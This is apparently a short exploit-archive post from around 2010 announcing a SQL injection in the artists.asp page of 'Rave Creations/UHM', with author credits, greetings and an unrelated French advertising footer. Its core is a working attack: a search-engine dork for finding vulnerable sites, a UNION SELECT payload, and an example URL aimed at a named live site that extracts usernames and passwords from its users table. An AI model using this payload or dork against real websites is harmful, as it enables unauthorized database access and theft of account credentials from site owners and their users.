Rave Creations/UHM suffers from a remote SQL injection vulnerability.
96fbc9f1ca11b1c2450dfc1be613579833fc603fd7ef4502fe34c0955dd0ea9e
************************************************************
** (artists.asp) SQL Injection Vulnerability
************************************************************
** Prodcut: Rave Creations/UHM
** Home : N/A
** Vunlerability : SQL Injection
** Risk : High
** Dork : "Sitedesign by: Dieleman www.dieleman.nl - Copyright © 2010"
************************************************************
** Discovred by: Ra3cH
** From : Algeria
** Contact : e51@hotmail.fr
** *********************************************************
** Greetz to : ALLAH
** All Members of http://www.DZ4All.cOm/Cc
** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & n2n & .....
************************************************************
** Exploit:
**
** http://[PATH]/artists.asp?id=(SQL)
**
** SQL=union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from users
**
************************************************************
** Exemple:
**
**
** http://www.u-h-m.nl/artists.asp?id=24%20union%20select%201,username,userpass,4,5,6,7,8,9,10,11,12,13%20from%20users
**
************************************************************
_________________________________________________________________
Vous voulez regarder la TV directement depuis votre PC ? C'est très simple avec Windows 7
http://clk.atdmt.com/FRM/go/229960614/direct/01/